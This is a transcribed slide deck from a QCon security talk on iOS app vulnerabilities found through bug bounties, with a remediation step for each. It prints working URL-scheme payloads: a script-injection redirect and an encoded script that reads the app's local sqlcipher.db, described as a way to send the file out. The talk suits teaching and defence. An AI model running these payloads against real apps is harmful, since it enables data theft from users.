Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Exploiting Common iOS Apps’ Vulnerabilities

Video and slides synchronized, mp3 and slide download available at URL https://bit.ly/2xQjjXl.

Ivan Rodriguez walks through some of the most common vulnerabilities on iOS apps and shows how to exploit them. All these vulnerabilities have been found on real production apps of companies that have (or don't have) a bug bounty program. This talk is useful for those connected with mobile app development or those who do use mobile apps to work with sensitive data. Filmed at qconsf.com.

Ivan Rodriguez is a Software Engineer at Google by day and a security researcher at night. He has found many vulnerabilities on different mobile applications and reported them through the popular bug bounty platforms HackerOne and Bugcrowd. He worked for many years as a mobile developer before changing his career and focusing on application security.

  • Login to see the comments

  • Be the first to like this

Exploiting Common iOS Apps’ Vulnerabilities

  1. 1. CommonVulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA
  2. 2. InfoQ.com: News & Community Site • Over 1,000,000 software developers, architects and CTOs read the site world- wide every month • 250,000 senior developers subscribe to our weekly newsletter • Published in 4 languages (English, Chinese, Japanese and Brazilian Portuguese) • Post content from our QCon conferences • 2 dedicated podcast channels: The InfoQ Podcast, with a focus on Architecture and The Engineering Culture Podcast, with a focus on building • 96 deep dives on innovative topics packed as downloadable emags and minibooks • Over 40 new content items per week Watch the video with slide synchronization on InfoQ.com! https://www.infoq.com/presentations/ exploiting-ios-vulnerabilities/
  3. 3. Purpose of QCon - to empower software development by facilitating the spread of knowledge and innovation Strategy - practitioner-driven conference designed for YOU: influencers of change and innovation in your teams - speakers and topics driving the evolution and innovation - connecting and catalyzing the influencers and innovators Highlights - attended by more than 12,000 delegates since 2007 - held in 9 cities worldwide Presented at QCon San Francisco www.qconsf.com
  4. 4. @ivRodriguezCA
  5. 5. DISCLAIMER the views and opinions expressed on this talk are solely my own and do not reflect the views or opinions of my employer. @ivRodriguezCA
  6. 6. ivan_rodriguez.me • security researcher and software engineer • focused on iOS reverse engineering and mobile bug bounty programs • i blog at ivrodriguez.com • find me on twitter: @ivRodriguezCA • find me on github: /ivRodriguezCA @ivRodriguezCA
  7. 7. agenda • reverse engineering an iOS app. • tools and methods. • common iOS vulnerabilities (all found on real world applications). • how to fix and prevent these vulnerabilities. • resources / conclusions. • questions. @ivRodriguezCA
  8. 8. reverse engineering an iOS app • iOS apps are encrypted with an algorithm called FairPlay. • we need a jailbroken device. • we don’t “decrypt” the apps, we just dump them from memory. • transfer them to a desktop where we do the reverse engineering. @ivRodriguezCA
  9. 9. reverse engineering an iOS app • how we dump the app from memory? > dump memory <filename> <start_address> <end_address> @ivRodriguezCA
  10. 10. reverse engineering an iOS app • how we dump the app from memory? > dump memory <filename> <start_address> <end_address> • we can use tools to automate this. @ivRodriguezCA
  11. 11. reverse engineering an iOS app • some of the tools we can use: - dumpdecrypted: https://github.com/stefanesser/dumpdecrypted - bfinject: https://github.com/BishopFox/bfinject - frida-ios-dump: https://github.com/AloneMonkey/frida-ios-dump @ivRodriguezCA
  12. 12. reverse engineering an iOS app @ivRodriguezCA
  13. 13. reverse engineering an iOS app @ivRodriguezCA
  14. 14. reverse engineering an iOS app @ivRodriguezCA
  15. 15. reverse engineering an iOS app • dynamic and static analysis @ivRodriguezCA
  16. 16. reverse engineering an iOS app • dynamic and static analysis @ivRodriguezCA
  17. 17. reverse engineering an iOS app • dynamic and static analysis @ivRodriguezCA
  18. 18. vulnerability # 1 • searching through embedded files within the app @ivRodriguezCA
  19. 19. vulnerability # 1 @ivRodriguezCA
  20. 20. vulnerability # 1 private_key @ivRodriguezCA
  21. 21. vulnerability # 1 private_key yes, PRIVATE key @ivRodriguezCA
  22. 22. vulnerability # 1 cloud server @ivRodriguezCA
  23. 23. vulnerability # 1 cloud server @ivRodriguezCA
  24. 24. vulnerability # 1 cloud server @ivRodriguezCA
  25. 25. vulnerability # 1 cloud server ssh @ivRodriguezCA
  26. 26. vulnerability # 1 cloud server ssh ! @ivRodriguezCA
  27. 27. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA
  28. 28. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA
  29. 29. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA
  30. 30. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA
  31. 31. how to fix vulnerability # 1 cloud server own server public api @ivRodriguezCA
  32. 32. how to fix vulnerability # 1 cloud server own server ssh @ivRodriguezCA
  33. 33. how to fix vulnerability # 1 cloud server own server ssh @ivRodriguezCA
  34. 34. vulnerability # 2 @ivRodriguezCA
  35. 35. vulnerability # 2 @ivRodriguezCA
  36. 36. vulnerability # 2 @ivRodriguezCA
  37. 37. vulnerability # 2 @ivRodriguezCA
  38. 38. vulnerability # 2 @ivRodriguezCA
  39. 39. @ivRodriguezCA
  40. 40. vulnerability # 2 • coinza://news/<trusted-html> @ivRodriguezCA
  41. 41. vulnerability # 2 • coinza://news/<trusted-html> - <html><body><script>document.location = ‘https://en.wikipedia.org/ wiki/URL_redirection’;</script></body></html> • @ivRodriguezCA
  42. 42. vulnerability # 2 • coinza://news/<trusted-html> - <html><body><script>document.location = ‘https://en.wikipedia.org/ wiki/URL_redirection’;</script></body></html> coinza://news/ %3Chtml%3E%3Cbody%3E%3Cscript%3Edocument.location%20%3D%20% 27https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FURL_redirection%27%3B% 3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E @ivRodriguezCA
  43. 43. how to fix vulnerability # 2 @ivRodriguezCA
  44. 44. how to fix vulnerability # 2 ! @ivRodriguezCA
  45. 45. how to fix vulnerability # 2 • URL Schemes + WebViews are dangerous and you should be careful when you pair them. • don’t load HTML code from user-controlled content. • if you need to dynamically react to URL Schemes have a set of whitelisted actions. @ivRodriguezCA
  46. 46. @ivRodriguezCA vulnerability # 3
  47. 47. @ivRodriguezCA vulnerability # 3
  48. 48. vulnerability # 3 @ivRodriguezCA
  49. 49. vulnerability # 3 @ivRodriguezCA
  50. 50. vulnerability # 3 @ivRodriguezCA
  51. 51. vulnerability # 3 == ? @ivRodriguezCA
  52. 52. vulnerability # 3 ✅ @ivRodriguezCA
  53. 53. vulnerability # 3 🛑 @ivRodriguezCA
  54. 54. vulnerability # 3 🛑 🚫 @ivRodriguezCA
  55. 55. vulnerability # 3 🛑 ✅ @ivRodriguezCA
  56. 56. vulnerability # 3 🛑 website.com @ivRodriguezCA
  57. 57. vulnerability # 3 🛑 username/password @ivRodriguezCA
  58. 58. vulnerability # 3 🛑 @ivRodriguezCA
  59. 59. @ivRodriguezCA
  60. 60. vulnerability # 3 @ivRodriguezCA
  61. 61. vulnerability # 3 detected connection to a website @ivRodriguezCA
  62. 62. vulnerability # 3 creates fakeTLS certificate @ivRodriguezCA
  63. 63. vulnerability # 3 sniffs client traffic @ivRodriguezCA
  64. 64. how to fix vulnerability # 3 • vet and test your 3rd party frameworks, specially if they handle your network requests. • be careful when implementing your own certificate validation logic. • if you want to implement HPKP you can useTrustKit: - https://github.com/datatheorem/TrustKit @ivRodriguezCA
  65. 65. how to fix vulnerability # 3 @ivRodriguezCA source: https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html
  66. 66. vulnerability # 4 @ivRodriguezCA
  67. 67. vulnerability # 4 @ivRodriguezCA
  68. 68. vulnerability # 4 @ivRodriguezCA
  69. 69. vulnerability # 4 @ivRodriguezCA
  70. 70. vulnerability # 4 @ivRodriguezCA
  71. 71. vulnerability # 4 • these methods are equivalent for local files @ivRodriguezCA
  72. 72. vulnerability # 4 @ivRodriguezCA
  73. 73. vulnerability # 4 file: sqlcipher.db path: Documents/ @ivRodriguezCA
  74. 74. vulnerability # 4 send file to a remote location. @ivRodriguezCA
  75. 75. vulnerability # 4 • coinza://news/ %3Chtml%3E%0A%20%20%20%3Cbody%3E%0A%20%20%20%20%20%20%3Cscript%3E%0A%20%20%20%20%20%20%20%20%20function%20loa dFile%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20var%20xmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%0 A%20%20%20%20%20%20%20%20%20%20%20%20documentsPath%20%3D%20document.URL.split%28%27%2F%27%29.slice%280%2C%20-1%29.j oin%28%27%2F%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20filePath%20%3D%20documentsPath%20%2B%20%27%2F%27% 20%2B%20%27sqlcipher.db%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onreadystatechange%20%3D%20function%28%2 9%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.readyState%20%3D%3D%204%29%20%7B%0A%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.responseText.length%20%3E%200%29%20%7B%0A%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%27Got%20file%20%5C%27sqlcipher.db%5C%27%2C%20size %3A%20%27%20%2B%20xmlhttp.responseText.length%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7 D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%3B%0A%2 0%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onerror%20%3D%20function%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20alert%28%27Error%21%20%27%20%2B%20filePath%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A %20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.open%28%27GET%27%2C%20filePath%2C%20true%29%3B%0A%20%20%20%20%20%2 0%20%20%20%20%20%20xmlhttp.send%28%29%3B%0A%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20wind ow.onload%20%3D%20loadFile%3B%0A%20%20%20%20%20%20%3C%2Fscript%3E%0A%20%20%20%20%20%20%3Cp%3E%0A%20%20%20%20% 20%20%20%20%20Hello%20World%0A%20%20%20%20%20%20%3C%2Fp%3E%0A%20%20%20%3C%2Fbody%3E%0A%3C%2Fhtml%3E @ivRodriguezCA
  76. 76. @ivRodriguezCA
  77. 77. how to fix vulnerability # 4 • do not use UIWebView anymore, use WKWebView instead. • if you absolutely have to use UIWebView: - do not use - (void)loadRequest:(NSURLRequest *)request for local files. - Use - (void)loadHTMLString:(NSString *)string baseURL:(NSURL *)baseURL with an URL object created with [URLWithString:@“about:blank”]. - @ivRodriguezCA
  78. 78. conclusions • add security assessments to your release cycles. • keep your 3rd party libraries up to date. • be careful copy-pasting code from online sources. • have a public bounty program or at least public channels for responsible disclosures. @ivRodriguezCA
  79. 79. resources • OWASP - Mobile Application SecurityVerification Standard
 https://github.com/OWASP/owasp-masvs • OWASP -The Mobile SecurityTesting Guide
 https://github.com/OWASP/owasp-mstg • Resources Page of my course
 https://github.com/ivRodriguezCA/RE-iOS-Apps/blob/master/ Resources.md @ivRodriguezCA
  80. 80. resources • for a more detailed guide visit:
 https://github.com/ivRodriguezCA/RE-iOS-Apps @ivRodriguezCA
  81. 81. @ivRodriguezCA
  82. 82. @ivRodriguezCA
  83. 83. questions? @ivRodriguezCA
  84. 84. thank you! @ivRodriguezCA
  85. 85. Watch the video with slide synchronization on InfoQ.com! https://www.infoq.com/presentations/ exploiting-ios-vulnerabilities/

×